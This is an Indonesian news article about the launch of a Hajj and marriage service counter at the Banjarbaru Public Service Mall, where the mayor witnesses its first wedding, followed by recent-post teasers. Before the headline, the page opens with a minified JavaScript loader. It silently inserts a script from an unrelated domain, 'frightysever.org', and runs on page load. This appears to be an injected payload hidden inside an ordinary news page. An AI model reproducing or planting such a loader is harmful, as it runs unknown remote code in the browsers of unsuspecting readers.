(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Ada Gerai Nikah-Haji di Mall Pelayanan Publik Banjarbaru, Wali Kota Aditya Jadi Saksi Akad Nikah Pertama


KANALKALIMANTAN.COM, BANJARBARU – Satu pelayanan terbaru dihadirkan Dinas Penananaman Modal dan Pelayanan Terpadu Satu Pintu (DPMPTSP) Kota Banjarbaru hasil kerjasama dengan Kementerian Agama (Kemenag) Kota Banjarbaru, Senin (17/10/2022).

Pelayanan terbaru yang hadir di Mall Pelayanan Publik Banjarbaru melayani haji dan pernikahan bagi warga Kota Banjarbaru.

Kepala Kantor Kemenag Kalsel, H Mahrus mengatakan, regulasi nikah di Mall Pelayanan Publik Banjarbaru pihak Kantor Kemenag Banjarbaru sudah mengirim surat resmi ke Kanwil Kemenag Kalsel.

“Regulasi yang ada kalau nikah di kantor KUA nol persen, kalau di rumah maka ada biaya tersendiri. Sedangkan di Mall Pelayanan Publik kami masih minta petunjuk dari Kanwil Kemenag Kalsel,” katanya.

 

Gerai pelayanan haji dan nikah di Mall Pelayanan Publik Banjarbaru diresmikan, Senin (17/10/2022).Foto: ibnu

Baca juga : Dominasi Babak Final, Jatim Optimis Juara Umum

Walau demikian dirinya berharap nikah di Mall Pelayanan Publik Banjarbaru sama dengan nikah di KUA atau gratis.

Sementara itu, Wali Kota Banjarbaru, Aditya Mifti Ariffin berharap, dengan adanya gerai pelayanan Kemenag Kota Banjarbaru di Mall Pelayanan Publik bisa memberikan akses kemudahan bagi masyarakat Banjarbaru.

“Alhamdulillah ini menjadi gerai ke 15 di Mall Pelayanan Publik Banjarbaru,” ujarnya.

Di tengah rangkaian acara launching gerai pelayanan Kemenag Kota Banjarbaru, Aditya juga menjadi saksi nikah bagi pasangan Nuridin dan Marniah, yang melangsungkan akad nikah di Mall Pelayanan Publik Kota Banjarbaru.

 

Baca juga : Dua Regu HSU Tampil Festival Seni Islami di Kiram

“Ini pernikahan pertama, selain gerai kita juga menyiapkan balai nikah bagi warga yang ingin menikah di Mall Pelayanan Publik Banjarbaru,” tuntasnya.

Di tempat sama Kepala Kanwil Kemenag Kalsel, H Muhammad Tambrin mengatakan dengan adanya gerai pelayanan haji dan nikah di Mall Pelayanan Publik Banjarbaru bisa masyarakat terlayani dengan maksimal.

“Ini merupakan percontohan bagi kabupaten/kota lain, kami sangat support strategi ini,” tuntasnya.(Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

4 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

6 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

8 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

9 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

11 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

12 jam ago

This website uses cookies.